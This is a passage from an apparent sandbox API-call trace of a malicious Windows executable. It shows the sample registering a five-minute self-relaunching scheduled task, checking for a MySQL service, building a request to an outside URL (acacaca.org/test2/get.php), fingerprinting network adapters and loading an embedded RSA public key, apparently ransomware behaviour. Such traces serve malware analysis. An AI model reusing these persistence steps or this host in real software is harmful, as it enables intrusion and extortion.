(HeapHandle=0x5f0000, Flags=0x0, Size=0x140) returned 0x62bf60 [0098.673] lstrlenA (lpString="\" --AutoStart") returned 13 [0098.673] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x120) returned 0x631d30 [0098.673] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x62bf60 | out: hHeap=0x5f0000) returned 1 [0098.673] PathFileExistsW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local\\4d45d74b-b67c-4b05-9c99-9061295dc2fa\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe") returned 1 [0098.674] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x120) returned 0x62bf60 [0098.674] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x631d30 | out: hHeap=0x5f0000) returned 1 [0098.674] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x120) returned 0x631d30 [0098.674] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x120) returned 0x2b83328 [0098.674] CoInitialize (pvReserved=0x0) returned 0x0 [0098.690] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0098.698] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x120) returned 0x2b27de8 [0098.698] CoCreateInstance (in: rclsid=0x4d506c*(Data1=0xf87369f, Data2=0xa4e5, Data3=0x4cfc, Data4=([0]=0xbd, [1]=0x3e, [2]=0x73, [3]=0xe6, [4]=0x15, [5]=0x45, [6]=0x72, [7]=0xdd)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x4d4fec*(Data1=0x2faba4c7, Data2=0x4da9, Data3=0x4013, Data4=([0]=0x96, [1]=0x97, [2]=0x20, [3]=0xcc, [4]=0x3f, [5]=0xd4, [6]=0xf, [7]=0x85)), ppv=0x18ea2c | out: ppv=0x18ea2c*=0x32ff68) returned 0x0 [0098.712] TaskScheduler:ITaskService:Connect (This=0x32ff68, serverName=0x18e4b8*(varType=0x0, wReserved1=0x63, wReserved2=0x1d28, wReserved3=0x63, varVal1=0x8f, varVal2=0x120), user=0x18e4c8*(varType=0x0, wReserved1=0x0, wReserved2=0x3, wReserved3=0x0, varVal1=0x0, varVal2=0x128), domain=0x18e4d8*(varType=0x0, wReserved1=0x0, wReserved2=0x120, wReserved3=0x0, varVal1=0x8f, varVal2=0x7), password=0x18e4e8*(varType=0x0, wReserved1=0x2b6, wReserved2=0xe9d4, wReserved3=0x18, varVal1=0x420cab, varVal2=0x5f0000)) returned 0x0 [0098.723] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x2b743f8 [0098.723] TaskScheduler:ITaskService:GetFolder (in: This=0x32ff68, Path="\\", ppFolder=0x18ea34 | out: ppFolder=0x18ea34*=0x2680448) returned 0x0 [0098.728] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2b743f8 | out: hHeap=0x5f0000) returned 1 [0098.728] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x2b743f8 [0098.728] ITaskFolder:DeleteTask (This=0x2680448, Name="Time Trigger Task", flags=0) returned 0x0 [0098.793] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2b743f8 | out: hHeap=0x5f0000) returned 1 [0098.793] TaskScheduler:ITaskService:NewTask (in: This=0x32ff68, flags=0x0, ppDefinition=0x18ea38 | out: ppDefinition=0x18ea38*=0x26804a0) returned 0x0 [0098.794] TaskScheduler:IUnknown:Release (This=0x32ff68) returned 0x1 [0098.794] ITaskDefinition:get_RegistrationInfo (in: This=0x26804a0, ppRegistrationInfo=0x18ea0c | out: ppRegistrationInfo=0x18ea0c*=0x2680560) returned 0x0 [0098.794] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x2b74428 [0098.794] IRegistrationInfo:put_Author (This=0x2680560, Author="Author Name") returned 0x0 [0098.794] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2b74428 | out: hHeap=0x5f0000) returned 1 [0098.794] IUnknown:Release (This=0x2680560) returned 0x1 [0098.794] ITaskDefinition:get_Principal (in: This=0x26804a0, ppPrincipal=0x18ea14 | out: ppPrincipal=0x18ea14*=0x26806f0) returned 0x0 [0098.794] IPrincipal:put_LogonType (This=0x26806f0, LogonType=3) returned 0x0 [0098.794] IUnknown:Release (This=0x26806f0) returned 0x1 [0098.794] ITaskDefinition:get_Settings (in: This=0x26804a0, ppSettings=0x18ea1c | out: ppSettings=0x18ea1c*=0x2680610) returned 0x0 [0098.795] ITaskSettings:put_StartWhenAvailable (This=0x2680610, StartWhenAvailable=1) returned 0x0 [0098.795] IUnknown:Release (This=0x2680610) returned 0x1 [0098.795] ITaskSettings:get_IdleSettings (in: This=0x2680610, ppIdleSettings=0x18ea00 | out: ppIdleSettings=0x18ea00*=0x2680680) returned 0x0 [0098.795] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x2b74428 [0098.795] IIdleSettings:put_WaitTimeout (This=0x2680680, WaitTimeout="PT5M") returned 0x0 [0098.795] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2b74428 | out: hHeap=0x5f0000) returned 1 [0098.795] IUnknown:Release (This=0x2680680) returned 0x1 [0098.795] ITaskDefinition:get_Triggers (in: This=0x26804a0, ppTriggers=0x18e9fc | out: ppTriggers=0x18e9fc*=0x26805d0) returned 0x0 [0098.795] ITriggerCollection:Create (in: This=0x26805d0, Type=1, ppTrigger=0x18ea08 | out: ppTrigger=0x18ea08*=0x2680750) returned 0x0 [0098.795] IUnknown:Release (This=0x26805d0) returned 0x1 [0098.795] IUnknown:QueryInterface (in: This=0x2680750, riid=0x4d50ec*(Data1=0xb45747e0, Data2=0xeba7, Data3=0x4276, Data4=([0]=0x9f, [1]=0x29, [2]=0x85, [3]=0xc5, [4]=0xbb, [5]=0x30, [6]=0x0, [7]=0x6)), ppvObject=0x18ea24 | out: ppvObject=0x18ea24*=0x2680750) returned 0x0 [0098.796] IUnknown:Release (This=0x2680750) returned 0x2 [0098.796] ITrigger:get_Repetition (in: This=0x2680750, ppRepeat=0x18ea10 | out: ppRepeat=0x18ea10*=0x26807a0) returned 0x0 [0098.796] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x2b74428 [0098.796] IRepetitionPattern:put_Interval (This=0x26807a0, Interval="PT5M") returned 0x0 [0098.796] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2b74428 | out: hHeap=0x5f0000) returned 1 [0098.796] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x2b74428 [0098.796] IRepetitionPattern:put_Duration (This=0x26807a0, Duration="") returned 0x0 [0098.796] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2b74428 | out: hHeap=0x5f0000) returned 1 [0098.796] ITrigger:put_Repetition (This=0x2680750, Repetition=0x26807a0) returned 0x0 [0098.796] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x2b74428 [0098.796] ITrigger:put_Id (This=0x2680750, Id="Trigger1") returned 0x0 [0098.796] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2b74428 | out: hHeap=0x5f0000) returned 1 [0098.796] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x2b74428 [0098.796] ITrigger:put_EndBoundary (This=0x2680750, EndBoundary="2030-05-02T08:00:00") returned 0x0 [0098.797] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2b74428 | out: hHeap=0x5f0000) returned 1 [0098.797] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18e4e4 | out: lpSystemTimeAsFileTime=0x18e4e4*(dwLowDateTime=0x9743d9a0, dwHighDateTime=0x1d8a8b9)) [0098.805] GetLastError () returned 0x0 [0098.806] GetTimeZoneInformation (in: lpTimeZoneInformation=0x511078 | out: lpTimeZoneInformation=0x511078) returned 0x2 [0098.818] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="W. Europe Standard Time", cchWideChar=-1, lpMultiByteStr=0x50af80, cbMultiByte=63, lpDefaultChar=0x0, lpUsedDefaultChar=0x18e44c | out: lpMultiByteStr="W. Europe Standard Time", lpUsedDefaultChar=0x18e44c) returned 24 [0098.818] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="W. Europe Daylight Time", cchWideChar=-1, lpMultiByteStr=0x50afc0, cbMultiByte=63, lpDefaultChar=0x0, lpUsedDefaultChar=0x18e44c | out: lpMultiByteStr="W. Europe Daylight Time", lpUsedDefaultChar=0x18e44c) returned 24 [0098.818] GetLastError () returned 0x0 [0098.818] ITrigger:put_StartBoundary (This=0x2680750, StartBoundary="2022-08-05T13:14:26") returned 0x0 [0098.818] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2b74428 | out: hHeap=0x5f0000) returned 1 [0098.818] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2bf0b80 | out: hHeap=0x5f0000) returned 1 [0098.818] IUnknown:Release (This=0x2680750) returned 0x1 [0098.818] ITaskDefinition:get_Actions (in: This=0x26804a0, ppActions=0x18ea18 | out: ppActions=0x18ea18*=0x2680518) returned 0x0 [0098.818] IActionCollection:Create (in: This=0x2680518, Type=0, ppAction=0x18ea04 | out: ppAction=0x18ea04*=0x26807e8) returned 0x0 [0098.818] IUnknown:Release (This=0x2680518) returned 0x1 [0098.819] IUnknown:QueryInterface (in: This=0x26807e8, riid=0x4d511c*(Data1=0x4c3d624d, Data2=0xfd6b, Data3=0x49a3, Data4=([0]=0xb9, [1]=0xb7, [2]=0x9, [3]=0xcb, [4]=0x3c, [5]=0xd3, [6]=0xf0, [7]=0x47)), ppvObject=0x18ea20 | out: ppvObject=0x18ea20*=0x26807e8) returned 0x0 [0098.819] IUnknown:Release (This=0x26807e8) returned 0x2 [0098.819] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x2b74428 [0098.819] IExecAction:put_Path (This=0x26807e8, Path="C:\\Users\\kEecfMwgj\\AppData\\Local\\4d45d74b-b67c-4b05-9c99-9061295dc2fa\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe") returned 0x0 [0098.819] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2b74428 | out: hHeap=0x5f0000) returned 1 [0098.819] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x2b74428 [0098.819] IExecAction:put_Arguments (This=0x26807e8, Arguments="--Task") returned 0x0 [0098.819] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2b74428 | out: hHeap=0x5f0000) returned 1 [0098.819] IUnknown:Release (This=0x26807e8) returned 0x1 [0098.819] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x2b74428 [0098.819] ITaskFolder:RegisterTaskDefinition (in: This=0x2680448, Path="Time Trigger Task", pDefinition=0x26804a0, flags=6, UserId=0x18e4c0*(varType=0x0, wReserved1=0x2b6, wReserved2=0xe9d4, wReserved3=0x18, varVal1=0x420cab, varVal2=0x5f0000), password=0x18e4d0*(varType=0x0, wReserved1=0x0, wReserved2=0x120, wReserved3=0x0, varVal1=0x8f, varVal2=0x7), LogonType=3, sddl=0x18e4e4*(varType=0x8, wReserved1=0x0, wReserved2=0x3, wReserved3=0x0, varVal1="", varVal2=0x128), ppTask=0x18e9ec | out: ppTask=0x18e9ec*=0x2680868) returned 0x0 [0098.884] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2b74428 | out: hHeap=0x5f0000) returned 1 [0098.884] TaskScheduler:IUnknown:Release (This=0x2680448) returned 0x0 [0098.884] TaskScheduler:IUnknown:Release (This=0x26804a0) returned 0x0 [0098.884] IUnknown:Release (This=0x2680868) returned 0x0 [0098.884] CoUninitialize () [0098.888] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2b27de8 | out: hHeap=0x5f0000) returned 1 [0098.889] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2b83328 | out: hHeap=0x5f0000) returned 1 [0098.889] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x631d30 | out: hHeap=0x5f0000) returned 1 [0098.889] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x639828 [0098.890] OpenServiceW (hSCManager=0x639828, lpServiceName="MYSQL", dwDesiredAccess=0x20) returned 0x0 [0098.890] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x40) returned 0x2b6bc10 [0098.890] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x25c) returned 0x2be8d50 [0098.890] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x25c) returned 0x2be67d8 [0098.890] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x25c) returned 0x2be6a40 [0098.890] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x25c) returned 0x2be6ca8 [0098.890] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x25c) returned 0x2b74cd8 [0098.890] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x25c) returned 0x2b74f40 [0098.890] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x25c) returned 0x2b751a8 [0098.890] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x25c) returned 0x2b75410 [0098.890] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x25c) returned 0x2b75678 [0098.890] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x25c) returned 0x2b758e0 [0098.890] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x25c) returned 0x2b75b48 [0098.890] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x25c) returned 0x2b75db0 [0098.890] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x25c) returned 0x2b76018 [0098.890] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x25c) returned 0x2b76280 [0098.890] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x25c) returned 0x2b764e8 [0098.891] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x25c) returned 0x2b76750 [0098.891] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x50) returned 0x2ba7278 [0098.891] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x50) returned 0x2ba7220 [0098.891] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x61a8000, lpStartAddress=0x41dbd0, lpParameter=0x62c298, dwCreationFlags=0x0, lpThreadId=0x513258 | out: lpThreadId=0x513258*=0xf4c) returned 0x508 [0099.262] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2ba7278 | out: hHeap=0x5f0000) returned 1 [0099.271] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x28) returned 0x2b6cfe8 [0099.271] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x25c) returned 0x2b769b8 [0099.314] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x25c) returned 0x2b76c20 [0099.314] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x25c) returned 0x2b76e88 [0099.314] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x25c) returned 0x2b770f0 [0099.314] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x25c) returned 0x2b77358 [0099.314] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x25c) returned 0x2b775c0 [0099.314] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x25c) returned 0x2b77828 [0099.315] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x25c) returned 0x2b77a90 [0099.315] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x25c) returned 0x2b77cf8 [0099.315] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x25c) returned 0x2b77f60 [0099.315] lstrlenA (lpString="http://acacaca.org/test2/get.php") returned 32 [0099.315] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x42) returned 0x2ba7858 [0099.315] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2b769b8, cbMultiByte=-1, lpWideCharStr=0x2ba7858, cchWideChar=33 | out: lpWideCharStr="http://acacaca.org/test2/get.php") returned 33 [0099.315] lstrcatW (in: lpString1="", lpString2="http://acacaca.org/test2/get.php" | out: lpString1="http://acacaca.org/test2/get.php") returned="http://acacaca.org/test2/get.php" [0099.315] lstrlenA (lpString="") returned 0 [0099.315] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x2b5c4a0 [0099.315] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2b76c20, cbMultiByte=-1, lpWideCharStr=0x2b5c4a0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0099.315] lstrcatW (in: lpString1="http://acacaca.org/test2/get.php", lpString2="" | out: lpString1="http://acacaca.org/test2/get.php") returned="http://acacaca.org/test2/get.php" [0099.315] lstrlenA (lpString="") returned 0 [0099.315] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x2b5c4d0 [0099.315] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2b76e88, cbMultiByte=-1, lpWideCharStr=0x2b5c4d0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0099.315] lstrcatW (in: lpString1="http://acacaca.org/test2/get.php", lpString2="" | out: lpString1="http://acacaca.org/test2/get.php") returned="http://acacaca.org/test2/get.php" [0099.315] lstrlenA (lpString="") returned 0 [0099.315] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x2b5c4f0 [0099.315] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2b770f0, cbMultiByte=-1, lpWideCharStr=0x2b5c4f0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0099.315] lstrcatW (in: lpString1="http://acacaca.org/test2/get.php", lpString2="" | out: lpString1="http://acacaca.org/test2/get.php") returned="http://acacaca.org/test2/get.php" [0099.315] lstrlenA (lpString="") returned 0 [0099.315] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x2b5c4e0 [0099.315] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2b77358, cbMultiByte=-1, lpWideCharStr=0x2b5c4e0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0099.316] lstrcatW (in: lpString1="http://acacaca.org/test2/get.php", lpString2="" | out: lpString1="http://acacaca.org/test2/get.php") returned="http://acacaca.org/test2/get.php" [0099.316] lstrlenA (lpString="") returned 0 [0099.316] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x2b5c460 [0099.316] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2b775c0, cbMultiByte=-1, lpWideCharStr=0x2b5c460, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0099.316] lstrcatW (in: lpString1="http://acacaca.org/test2/get.php", lpString2="" | out: lpString1="http://acacaca.org/test2/get.php") returned="http://acacaca.org/test2/get.php" [0099.316] lstrlenA (lpString="") returned 0 [0099.316] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x2b5c4c0 [0099.316] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2b77828, cbMultiByte=-1, lpWideCharStr=0x2b5c4c0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0099.316] lstrcatW (in: lpString1="http://acacaca.org/test2/get.php", lpString2="" | out: lpString1="http://acacaca.org/test2/get.php") returned="http://acacaca.org/test2/get.php" [0099.316] lstrlenA (lpString="") returned 0 [0099.316] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x2b5c490 [0099.316] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2b77a90, cbMultiByte=-1, lpWideCharStr=0x2b5c490, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0099.316] lstrcatW (in: lpString1="http://acacaca.org/test2/get.php", lpString2="" | out: lpString1="http://acacaca.org/test2/get.php") returned="http://acacaca.org/test2/get.php" [0099.316] lstrlenA (lpString="") returned 0 [0099.316] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x2b5c470 [0099.316] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2b77cf8, cbMultiByte=-1, lpWideCharStr=0x2b5c470, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0099.316] lstrcatW (in: lpString1="http://acacaca.org/test2/get.php", lpString2="" | out: lpString1="http://acacaca.org/test2/get.php") returned="http://acacaca.org/test2/get.php" [0099.316] lstrlenA (lpString="") returned 0 [0099.316] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x2b5c440 [0099.316] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2b77f60, cbMultiByte=-1, lpWideCharStr=0x2b5c440, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0099.316] lstrcatW (in: lpString1="http://acacaca.org/test2/get.php", lpString2="" | out: lpString1="http://acacaca.org/test2/get.php") returned="http://acacaca.org/test2/get.php" [0099.316] lstrlenW (lpString="") returned 0 [0099.316] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x12) returned 0x2b84528 [0099.316] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x288) returned 0x2be6f10 [0099.317] GetAdaptersInfo (in: AdapterInfo=0x2be6f10, SizePointer=0x18ea04 | out: AdapterInfo=0x2be6f10, SizePointer=0x18ea04) returned 0x0 [0099.708] GetAdaptersInfo (in: AdapterInfo=0x2be6f10, SizePointer=0x18ea04 | out: AdapterInfo=0x2be6f10, SizePointer=0x18ea04) returned 0x0 [0099.722] GetLastError () returned 0x0 [0099.953] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1000) returned 0x2bdfe50 [0099.953] GetLastError () returned 0x0 [0099.978] GetLastError () returned 0x0 [0099.979] CryptAcquireContextW (in: phProv=0x18e9d4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x18e9d4*=0x647e98) returned 1 [0099.981] CryptCreateHash (in: hProv=0x647e98, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x18e9dc | out: phHash=0x18e9dc) returned 1 [0099.981] CryptHashData (hHash=0x2b356f8, pbData=0x2b79520, dwDataLen=0x11, dwFlags=0x0) returned 1 [0099.981] CryptGetHashParam (in: hHash=0x2b356f8, dwParam=0x2, pbData=0x0, pdwDataLen=0x18e9d8, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x18e9d8) returned 1 [0099.981] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x11) returned 0x2b846c8 [0099.981] CryptGetHashParam (in: hHash=0x2b356f8, dwParam=0x2, pbData=0x2b846c8, pdwDataLen=0x18e9d8, dwFlags=0x0 | out: pbData=0x2b846c8, pdwDataLen=0x18e9d8) returned 1 [0099.981] GetLastError () returned 0x0 [0099.981] CryptDestroyHash (hHash=0x2b356f8) returned 1 [0099.981] CryptReleaseContext (hProv=0x647e98, dwFlags=0x0) returned 1 [0099.981] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2b79520 | out: hHeap=0x5f0000) returned 1 [0099.981] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x30) returned 0x2b6abc0 [0099.981] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2b6b090 | out: hHeap=0x5f0000) returned 1 [0099.981] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2b79958 | out: hHeap=0x5f0000) returned 1 [0099.981] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x61a8000, lpStartAddress=0x41e690, lpParameter=0x513270, dwCreationFlags=0x0, lpThreadId=0x51325c | out: lpThreadId=0x51325c*=0xf50) returned 0x530 [0100.247] WaitForSingleObject (hHandle=0x530, dwMilliseconds=0xffffffff) returned 0x0 [0102.763] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}") returned 0x53c [0102.763] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x28) returned 0x2b6ccb8 [0102.763] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x25c) returned 0x2b781c8 [0102.763] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x25c) returned 0x2b78430 [0102.763] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x25c) returned 0x2b78698 [0102.763] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x25c) returned 0x2b78900 [0102.764] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x25c) returned 0x2b79cd8 [0102.764] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x25c) returned 0x2b79f40 [0102.764] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x25c) returned 0x2b7a1a8 [0102.764] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x25c) returned 0x2b7a410 [0102.764] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x25c) returned 0x2b7a678 [0102.764] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x25c) returned 0x2b7a8e0 [0102.764] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x3e0) returned 0x2bf0e48 [0102.764] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x5ec) returned 0x2bf0350 [0102.764] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n", cchWideChar=-1, lpMultiByteStr=0x2bf0350, cbMultiByte=1516, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n", lpUsedDefaultChar=0x0) returned 493 [0102.764] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x5f0) returned 0x2bf6498 [0102.765] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2bf0350 | out: hHeap=0x5f0000) returned 1 [0102.765] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2bf0e48 | out: hHeap=0x5f0000) returned 1 [0102.800] CryptAcquireContextW (in: phProv=0x18ea44, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x18ea44*=0x647e98) returned 1 [0102.802] CryptCreateHash (in: 